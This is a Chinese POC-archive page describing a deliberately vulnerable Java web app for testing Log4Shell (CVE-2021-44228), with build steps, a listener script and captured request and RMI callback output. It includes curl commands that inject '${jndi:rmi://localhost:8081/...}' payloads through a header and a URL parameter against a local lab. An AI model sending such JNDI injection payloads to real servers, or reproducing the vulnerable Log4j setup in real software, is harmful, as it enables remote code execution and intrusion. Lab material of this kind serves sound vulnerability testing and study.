POC详情: 54b2eb715f726853c04a43dc640b22ffcfa08f88

来源
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
This is a potentially vulnerable Java web application containing Log4j affected by log4shell(CVE-2021-44228).
介绍
# Log4Shell Vulnerable Application(l4s-vulnapp)

This is a potentially vulnerable Java web application containing Log4j(2.14.1) affected by [log4shell](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228)(CVE-2021-44228).

## Verified environment and various versions

- [AdoptOpenJDK 17.0.10+7](https://adoptium.net/temurin/releases/?os=windows&arch=x64&package=jdk&version=17)
- [Gradle 8.6](https://gradle.org/next-steps/?version=8.6&format=all)
- [Gretty 4.1.2](https://plugins.gradle.org/plugin/org.gretty)
- [Apache Tomcat 10.1.15](https://tomcat.apache.org/tomcat-10.1-doc/changelog.html#Tomcat_10.1.15_(schultz))
- [Apache Log4j Core 2.14.1](https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/2.14.1)

## Preparation

- Download and extract [AdoptOpenJDK](https://adoptium.net/temurin/releases/) zip file.
- set a PATH and JAVA_HOME variable.
- Execute `java --version` command to check if AdoptOpenJDK works properly.

[Note]  
If you want to change the JDK version, tomcat port, etc., edit build.gradle.

## Build and Run

Execute Gradle wrapper with build.gradle.

```
# on Linux
./gradlew appRun

# on Windows
.\gradlew.bat appRun
```

Top URL:

```
http://localhost:8080/l4s-vulnapp/
```

[Note]  
Log4Shell triggers only when the app performs some Log4j logging.   
For example, if the following URL is accessed, Log4Shell will be executed.

```
http://localhost:8080/l4s-vulnapp/servlet
```

You can check Log4Shell by tampering with "x-param" value or by adding "x-log" header to the HTTP request when accessing it.  
These params will be logged by Log4j.  
However, this is only if a listening server is standing at localhost:8081.

```
curl http://localhost:8080/l4s-vulnapp/servlet -H 'x-log: ${jndi:rmi://localhost:8081/test.txt}'
curl -X GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D
```

## Verification Results

- HTTP Request
  
  ```
  GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D HTTP/1.1
  Host: localhost:8080
  Connection: keep-alive
  Cache-Control: max-age=0
  sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)   Chrome/122.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/  *;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Referer: http://localhost:8080/l4s-vulnapp/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: ja,en-US;q=0.9,en;q=0.8
  
  
  ```

- HTTP Response

  ```
  HTTP/1.1 200
  Content-Type: text/plain;charset=utf-8
  Content-Length: 62
  Date: Fri, 15 Mar 2024 18:42:56 GMT
  Keep-Alive: timeout=60
  Connection: keep-alive

  Hello
  Logging to console using vulnerable Log4j2 by parameter
  ```

- RMI Request by l4s-vulnapp

  ```
  2024/03/16 03:42:46: [Start] Receive Server for Log4Shell.
  2024/03/16 03:42:46: [Note] Listening on IP: "localhost" Port: 8081
  2024/03/16 03:42:55: [Note] Requested from IP: "127.0.0.1" Port: 53282)
  2024/03/16 03:42:55: [Hex data] ===== start =====
  2024/03/16 03:42:56: 00000000   4A 52 4D 49 00 02 4B 00 00 00 00 00 00 00 00 00  JRMI..K.........
  2024/03/16 03:42:56: 00000010   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2024/03/16 03:42:56: [Hex data] =====  end  =====
  2024/03/16 03:42:56: [Raw data] ===== start =====
  2024/03/16 03:42:56: JRMI
  2024/03/16 03:42:56: [Raw data] =====  end  =====
  ```

## Option

l4s-ls.ps1  starts a listen server, execute this script on Windows PowerShell/Command Prompt.  
This server receives binary communications such as LDAP and RMI, and can display the contents of said communications in Hex and Raw.  
If the script malfunctions, use Ctrl + C to stop.

[Caution]  
When running this script for the first time, it is necessary to select "Private Network" in the Windows pop-up.

```
PowerShell -ExecutionPolicy RemoteSigned .\l4s-ls.ps1 -p 8081
```

## References

- [GitHub - tothi/log4shell-vulnerable-app](https://github.com/tothi/log4shell-vulnerable-app)
- [ももいろテクノロジー - PowerShellでnc(netcat)を書いてみる (2015/4/16)](https://inaz2.hatenablog.com/entry/2015/04/16/025953)

文件快照
 [4.0K]  /data/pocs/54b2eb715f726853c04a43dc640b22ffcfa08f88
├── [ 602]  build.gradle
├── [4.0K]  gradle
│   └── [4.0K]  wrapper
│       ├── [ 42K]  gradle-wrapper.jar
│       └── [ 250]  gradle-wrapper.properties
├── [8.5K]  gradlew
├── [2.8K]  gradlew.bat
├── [3.6K]  l4s-ls.ps1
├── [4.4K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  l4svuln
        │       └── [1.5K]  VulnServlet.java
        ├── [4.0K]  resources
        │   └── [ 407]  log4j2.properties
        └── [4.0K]  webapp
            ├── [ 326]  index.html
            └── [4.0K]  WEB-INF
                └── [ 489]  web.xml

9 directories, 11 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。